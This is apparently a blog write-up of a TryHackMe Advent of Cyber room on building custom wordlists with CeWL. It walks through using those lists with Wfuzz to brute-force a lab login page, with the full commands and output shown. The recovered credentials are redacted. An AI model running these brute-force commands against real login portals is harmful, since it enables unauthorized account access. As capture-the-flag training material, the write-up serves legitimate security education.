RedTeam Capstone Challegen TryHackMe
TryHackMe
HackTheBox

Day 4

This room is a simple introfuction to the Linux tool CeWL. CeWL (pronounced "cool") is a custom word list generator tool that spiders websites to create word lists based on the site's content

Learning Objectives

  • What is CeWL?

  • What are the capabilities of CeWL?

  • How can we leverage CeWL to generate a custom wordlist from a website?

  • How can we customise the tool's output for specific tasks?

The room is a very straightforward introduction to the tool with all the commands given.

CeWL is a wordlist generator that is unique compared to other tools available. While many tools rely on pre-defined lists or common dictionary attacks, CeWL creates custom wordlists based on web page content.

We start with making a basic wordlist from the website and output it into a file

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl http://10.10.126.196 -w output.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

The contents of the file is a world list as follows.

└─$ cat output.txt  
Start
End
and
the
AntarctiCrafts
our
Stylesheet
.
.
.
Visit
office
Send
Message
Login
Submit

CeWL provides a lot of options that allow you to tailor the wordlist to your needs:

  1. Specify spidering depth: The -d option allows you to set how deep CeWL should spider. For example, to spider two links deep: cewl http://machine_ip -d 2 -w output1.txt

  2. Set minimum and maximum word length: Use the -m and -x options respectively. For instance, to get words between 5 and 10 characters: cewl http://machine_ip -m 5 -x 10 -w output2.txt

  3. Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication.

  4. Custom extensions: The --with-numbers option will append numbers to words, and using --extension allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.

  5. Follow external links: By default, CeWL doesn't spider external sites, but using the --offsite option allows you to do so.

For this room we need to gain access to the portal located at http://machine_ip/login.php

We first create a username and password list based on the website.

Username List:

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 0 -m 5 -w usernames.txt http://10.10.126.196/team.php --lowercase                                                                         
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat usernames.txt                                                        
antarcticrafts
stylesheet
start
members
officer
.
.
.
links
rights
reserved

Password List:

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 2 -m 5 -w passwords.txt http://10.10.126.196 --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat passwords.txt                                                  
Start
AntarctiCrafts
Stylesheet
About
.
.
.
Message
Login
Submit

No we can attempt to brute force the login page with Wfuzz.

Wfuzz is a tool designed for brute-forcing web applications. It can be used to find resources not linked directories, servlets, scripts, etc, brute-force GET and POST parameters for checking different kinds of injections (SQL, XSS, LDAP), brute-force forms parameters (user/password) and fuzzing.

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.126.196/login.php -d "username=FUZZ&password=FUZ2Z"
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.126.196/login.php
Total requests: 9361

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000006317:   302        118 L    297 W      4442 Ch     "[REDACTED] - [REDACTED]"                                                                                                                                                       

Total time: 0
Processed Requests: 9361
Filtered Requests: 9360
Requests/sec.: 0

We now have our username and password. We can proceed to login to the portal.

We can see this is a mailbox and the flag can be found here.

PreviousDay 3NextDay 5

Last updated